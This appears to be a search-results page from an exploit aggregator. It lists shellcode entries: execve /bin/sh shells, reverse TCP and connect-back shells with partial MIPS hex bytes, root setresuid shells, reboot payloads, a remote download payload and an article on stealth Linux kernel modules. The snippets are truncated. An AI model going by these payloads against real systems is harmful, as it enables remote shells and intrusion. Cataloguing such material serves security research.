Lucene search
K

17 matches found

0day.today
0day.today
added 2019/06/18 12:0 a.m.634 views

Linux/x86_64 - execve(/bin/sh) Shellcode (22 bytes)

Title: Linux/x8664 - execve/bin/sh 22 bytes ;Author: Aron Mihaljevic ;Architecture: Linux x8664 ;Shellcode Length: 22 bytes ;github = https://github.com/STARRBOY ============ASM=========================== global start section .text start: ;int execveconst char filename, char const argv,char const...

0.1AI score
Exploits0
0day.today
0day.today
added 2018/10/08 12:0 a.m.87 views

Linux/MIPS (Big Endian) - execve(/bin/sh) + Reverse TCP 192.168.2.157/31337 Shellcode (181 bytes)

/ Linux/MIPS Big Endian - execve/bin/sh + Reverse TCP 192.168.2.157/31337 Shellcode 181 bytes Author: cq674350529 - execve'/bin/sh', tcp - 192.168.2.157/31337 - used in HTTP Request - tested on D-Link dir-850l router, avoid bad chars '\x00', '\x20', '\x23', '\x0d\x0a' - based on rigan's shellcode...

0.2AI score
Exploits0
0day.today
0day.today
added 2016/08/10 12:0 a.m.16 views

Linux/x86 - zsh Reverse TCP Shellcode port 9090 (80 bytes)

/ ; ; Linux x86 ; Author: thryb ; Date: 21-07-16 ; Purpose: Reverse /bin/zsh to TCP port 9090 ; Size: 80 bytes ; ID: SLAE-770 ; Git: https://www.github.com/thryb/SLAE-770 ; global start section .text start: xor eax, eax ; cleaning registers xor ebx, ebx ; 1 - create socket ; socketAFINET,...

7.4AI score
Exploits0
0day.today
0day.today
added 2016/01/04 12:0 a.m.29 views

Linux/x86 - execve "/bin/sh" Shellcode (24 bytes)

/ ; Title: Linux/x86 execve "/bin/sh" - shellcode 24 byte ; Platform: linux/x86 ; Date: 2015-01-03 ; Author: Dennis 'dhn' Herrmann ; Website: https://zer0-day.pw BITS 32 global start section .text ; syscalls kernel SYSEXECVE equ 0x0b start: ; execve"/bin//sh", 0, 0; push SYSEXECVE ; SYSEXECVE = 1...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.17 views

45 bytes sys_execve("/bin/sh", "-c", "reboot") x86 linux shellcode

No description provided by source. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ 0 0 \ \ /\ /\ \ \ \ /\ \ \ /\ /\ \ \ \ \ \ \ / 1 1 \ \ \ \\ \ \ /\ \...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.9 views

linux/x86 sys_execve("/bin/sh", "0", "0") with umask 16 (sys_umask(14)) 45 bytes

No description provided by source. 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ /'\ \ /\ \ \ \ /'\ 0 0 \ \ /\ /\ \ \ \ /\ \ \ /\ /\ \ \ \ \ \ \ / 1 1 \ \ \ \\ \ \ /\ \...

7.1AI score
Exploits0
seebug.org
seebug.org
added 2014/07/01 12:0 a.m.17 views

Linux/MIPS - connect back shellcode (port 0x7a69) - 168 bytes.

No description provided by source. / Title: Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Author: rigan - imrigan sobachka gmail.com / include stdio.h char sc = \x24\x0f\xff\xfd // li t7,-3 \x01\xe0\x20\x27 // nor a0,t7,zero \x01\xe0\x28\x27 // nor a1,t7,zero \x28\x06\xff\xff // sl...

7.1AI score
Exploits0
0day.today
0day.today
added 2012/01/14 12:0 a.m.30 views

linux/x86 sys_execve ["/bin/sh"] setresuid(0,0,0) exit(0) - 102 bytes

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site : 1337day.com 0 1 + Support e-mail :...

7.4AI score
Exploits0
Exploit DB
Exploit DB
added 2011/12/10 12:0 a.m.25 views

Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes

Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Shellcode exploit for linuxmips platform / Title: Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Author: rigan - imrigan sobachka gmail.com / include char sc = "\x24\x0f\xff\xfd" // li t7,-3 "\x01\xe0\x20\x27" // nor...

0.2AI score
Exploits0
0day.today
0day.today
added 2011/12/10 12:0 a.m.19 views

linux/mips - connect back shellcode (port 0x7a69) - 168 bytes

/ Title: Linux/MIPS - connect back shellcode port 0x7a69 - 168 bytes. Author: rigan - imrigan sobachka gmail.com / include char sc = "\x24\x0f\xff\xfd" // li t7,-3 "\x01\xe0\x20\x27" // nor a0,t7,zero "\x01\xe0\x28\x27" // nor a1,t7,zero "\x28\x06\xff\xff" // slti a2,zero,-1 "\x24\x02\x10\x57" //...

0.2AI score
Exploits0
0day.today
0day.today
added 2011/07/01 12:0 a.m.29 views

OpenBSD/x86 sys_execve ('/bin/sh -c "reboot"') - 178 bytes (encoded)

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0 0 // type local, remote, DoS, etc. 1 1 1 0 + Site : 1337day.com 0 1 + Support e-mail :...

7.4AI score
Exploits0
0day.today
0day.today
added 2010/05/31 12:0 a.m.17 views

linux/x86 sys_execve("/bin/sh", "0", "0") with umask 16 (sys_umask(14))

Exploit for linux/x86 platform in category shellcode ================================================================================ linux/x86 sysexecve"/bin/sh", "0", "0" with umask 16 sysumask14 45 bytes ================================================================================...

7AI score
Exploits0
0day.today
0day.today
added 2010/05/31 12:0 a.m.19 views

linux/x86 sys_execve("/bin/sh", "-c", "ping localhost") 55 bytes

Exploit for linux/x86 platform in category shellcode ========================================================================== linux/x86 sysexecve"/bin/sh", "-c", "ping localhost" shellcode 55 bytes ==========================================================================...

7AI score
Exploits0
Exploit DB
Exploit DB
added 2010/05/31 12:0 a.m.29 views

sys_execve"/bin/sh", "-c", "reboot" x86 linux shellcode 45 bytes

45 bytes sysexecve"/bin/sh", "-c", "reboot" x86 linux shellcode. Shellcode exploit for linux platform 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 1 1 /' \ /'\ /\ \ /'\ 0 0 /, \ /\/\ \ \ \ \ ,/\ /\ \ 1 1 //\ \ /' \ /\ //\ Exploit database separated by exploit 0...

7.4AI score
Exploits0
0day.today
0day.today
added 2010/05/31 12:0 a.m.24 views

linux/x86 sys_execve("/bin/sh", "-c", "reboot") shellcode 45 bytes

Exploit for linux/x86 platform in category shellcode ================================================================== linux/x86 sysexecve"/bin/sh", "-c", "reboot" shellcode 45 bytes ==================================================================...

7AI score
Exploits0
0day.today
0day.today
added 2010/05/31 12:0 a.m.15 views

linux/x86 sys_execve("/usr/bin/lwp-download", "evil") shellcode 52 bytes

Exploit for linux/x86 platform in category shellcode ======================================================================== linux/x86 sysexecve"/usr/bin/lwp-download", "evil" shellcode 52 bytes ========================================================================...

7AI score
Exploits0
Packet Storm
Packet Storm
added 1999/09/22 12:0 a.m.36 views

linux_stealth_module.txt

Subject: yet another article about stealth modules in linux. To: [email protected] abtrom: anti btrom .................. Preface: ........ I've seen many stealth modules for Linux. New ways of of hiding the modules are found, so the 'lsmod' cant find them, etc, etc. But the problem is tha...

7.4AI score
Exploits0
Rows per page
Query Builder